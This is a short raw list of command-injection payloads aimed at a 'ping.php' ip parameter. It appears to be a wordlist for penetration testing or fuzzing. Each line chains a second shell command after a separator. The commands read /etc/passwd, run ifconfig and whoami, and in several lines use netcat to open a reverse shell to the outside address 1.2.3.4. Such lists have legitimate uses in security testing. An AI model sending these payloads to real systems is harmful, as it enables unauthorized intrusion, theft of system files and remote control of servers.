/ping.php?ip=abc1 & cat /etc/passwd
/ping.php?ip=abc1 && cat /etc/passwd
/ping.php?ip=abc1 | cat /etc/passwd
/ping.php?ip=abc1 || cat /etc/passwd
/ping.php?ip=abc1 ; cat /etc/passwd
/ping.php?ip=abc1 & ifconfig
/ping.php?ip=abc1 && ifconfig
/ping.php?ip=abc1 | ifconfig
/ping.php?ip=abc1 || ifconfig
/ping.php?ip=abc1 ; ifconfig
/ping.php?ip=abc1 & nc -e 1.2.3.4 1111
/ping.php?ip=abc1 && nc -e 1.2.3.4 1111
/ping.php?ip=abc1 | nc -e 1.2.3.4 1111
/ping.php?ip=abc1 || nc -e 1.2.3.4 1111
/ping.php?ip=abc1 ; nc -e 1.2.3.4 1111
/ping.php?ip=abc1 & whoami
/ping.php?ip=abc1 && whoami
/ping.php?ip=abc1 | whoami
/ping.php?ip=abc1 || whoami